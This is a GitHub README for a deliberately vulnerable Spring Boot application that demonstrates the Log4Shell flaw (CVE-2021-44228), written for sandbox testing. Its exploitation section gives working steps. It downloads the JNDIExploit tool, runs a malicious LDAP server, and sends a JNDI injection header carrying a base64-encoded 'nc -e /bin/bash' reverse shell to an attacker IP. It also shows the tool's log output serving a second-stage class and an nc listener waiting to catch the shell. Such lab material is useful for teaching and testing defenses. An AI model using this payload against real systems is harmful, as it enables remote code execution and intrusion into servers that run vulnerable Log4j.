shad0w0lf/log4shell-vulnerable-app

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Log4Shell sample vulnerable application (CVE-2021-44228)

This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181.

Running the application

Run it:

docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Build it yourself (you don't need any Java-related tooling):

docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

Exploitation steps

Note: This is highly inspired from the original LunaSec advisory. Run at your own risk, preferably in a VM in a sandbox environment.

• Use JNDIExploit to spin up a malicious LDAP server

wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888

• Then, trigger the exploit using the following, but change your ip address in the base64 encoded command with:

# change ip address
echo "nc <your ip> 80 –e /bin/bash" | base64 -w 0

# will execute 'nc 192.168.178.102 80 –e /bin/bash'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/bmMgMTkyLjE2OC4xNzguMTAyIDgwIC1lIC9iaW4vc2g=}'

• Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTkyLjE2OC4xNzguMTAyIDgwIC1lIC9iaW4vc2g=
[+] Paylaod: command
[+] Command: nc 192.168.178.102 80 -e /bin/sh

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200

• To confirm that the code execution was successful, spawn a nc listener with nc -nvlp 80:

$ nc -nvlp 80

## Reference

https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

## Contributors

[@christophetd](https://twitter.com/christophetd)
[@rayhan0x01](https://twitter.com/rayhan0x01)